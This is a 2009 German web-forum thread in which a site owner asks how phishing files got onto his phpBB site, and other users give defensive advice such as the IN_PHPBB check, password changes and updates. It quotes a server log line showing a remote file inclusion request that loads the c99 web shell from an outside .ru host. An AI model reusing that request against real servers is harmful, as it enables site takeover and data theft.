Seite 1 von 1

Pishing Dateien

Verfasst: Sa 18.Jul, 2009 18:23
von diegoriv
all-inkl hat heute Pishing Dateien auf unserem Webspace gefunden.

Nun bin ich damit beschäftigt die Seite wieder herzustellen und frage mich, wie ich herausfinde, woher die kommen.

Folgenden Logfile-Auszug hat mir der Support geschickt:
- [17/Jul/2009:01:51:32 +0200] "POST /calendar.php//language/lang_english/lang_main_album.php?phpbb_root_path=http%3A%2F%2Fxakforum.altnet.ru%2Ftmp_upload%2Ffiles%2Fc99shell.txt%3F&act=ls&d=%2Fwww%2Fhtdocs%2Fv130649%2Fbackup&sort=0a HTTP/1.1" 200 7675 "http://alpinum.at/calendar.php//languag ... up&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Leider verstehe ich davon rein gar nichts. calendar und lang_main_album haben beispielsweise nichts miteinander zu tun.

Was kann ich also aus dem Log rausholen? Wie und Wo setze ich an?

Danke
d.

Verfasst: So 19.Jul, 2009 15:20
von oxpus
Tjoar, in dem Log-Auszug steht diese Domain drinnen: forum.altnet.ru
Vielleicht ein Hinweis auf die Hacker, wobei das auch nur schwer zu beweisen wäre ;)

Wichtig ist aber zu erkennen, wie die eingebrochen sind.
Und zwar in die Datei lang_main_album.php!!

Dieses ist nämlich Teil eines in diesem Log-Auszug enthaltenen Links, mit dem ein Script auf deinem Webspace abgelegt wurde.

Was dagegen für zukünftige Einbrüche tun?
Alle(!!!!) Passwörter ändern und in diesem Fall folgende Änderungen an der Datei language/lang.../lang_main_album.php durchführen:

Code: Alles auswählen

#
#-----[ FIND ]-----
#
//
// Album Index
//

#
#-----[ BEFORE, ADD ]-----
#
if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}

Verfasst: So 19.Jul, 2009 19:16
von Holger
Sollte man das in allen lang-Dateien machen?

Verfasst: So 19.Jul, 2009 21:31
von diegoriv
Danke oxpus für deine Analyse.
irgendwo in .ru nach einem Schuldigen zu suchen hab ich ohnehin nicht vor.

Dummerweise oder gscheiterweise startet meine lang_main_album mit

Code: Alles auswählen

if ( !defined('IN_PHPBB') )
{
   die('Hacking attempt');
   exit;
}
wie kam der Kerl trotzdem rein?

Verfasst: Mo 20.Jul, 2009 11:25
von oxpus
Er hat die Datei aufgerufen und damit ein Script "hinterrücks" mit drauf gepackt.
Je nach Absicherung des Boards und des Webservers ist er dann mehr oder weniger erfolgreich.
Ein Punkt ist eben die Prüfung der Konstante IN_PHPBB, aber bei weitem nicht alles.

Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.

Verfasst: Mo 20.Jul, 2009 21:57
von diegoriv
[quote="oxpus";p="88583"]Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.[/quote]

Volles Verständnis - kein Problem. Interessiert mich auch eher nur sekundär. Primär beschäftigt mich eher die Frage: Was kann ich dagegen tun?

Verfasst: Di 21.Jul, 2009 17:12
von oxpus
Was du dagegen tun kannst?
Immer alle Updates einspielen, die es zu deinen eingesetzten Scripten gibt, keine "einfachen Passwörter" verwenden, Verzeichnisschutz einrichten, wo es Sinn macht (z. B. im Admin-Ordner des Forums), etc...